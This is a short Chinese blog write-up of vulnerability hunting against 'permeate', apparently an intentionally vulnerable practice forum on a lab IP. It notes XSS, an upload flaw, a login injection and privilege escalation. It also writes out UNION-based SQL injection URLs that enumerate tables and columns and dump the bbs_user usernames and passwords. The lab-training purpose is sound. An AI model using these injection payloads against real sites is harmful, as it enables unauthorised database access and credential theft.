permate漏洞挖掘

1.反射型xss

img

搜索框尝试xss语句,发现存在反射型xss

2.SQL注入

img

存在sql注入

img

--+注释,发现存在11个字段

http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,11--+

img

发现3字段跟11字段有回显

[http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema='permeate' --+](http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema='permeate' --+)

img

查表

[http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_name='bbs_user' --+](http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_name='bbs_user' --+)

img

查字段

[http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,password) from permeate.bbs_user --+](http://10.196.8.31/home/index.php?m=tiezi&a=index&bk=5 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,password) from permeate.bbs_user --+)

img

查内容

3.后台登陆存在sql注入

img

img

4.普通登陆后上传点

img

可以上传成功,但是文件名被改

5.发帖出存在存储型xss

img

img

6.注册用户登陆后,点击后台管理发现直接是最高权限,越权

img

posted @ 2022-06-13 09:46  Rlins  阅读(73)  评论(0)    收藏  举报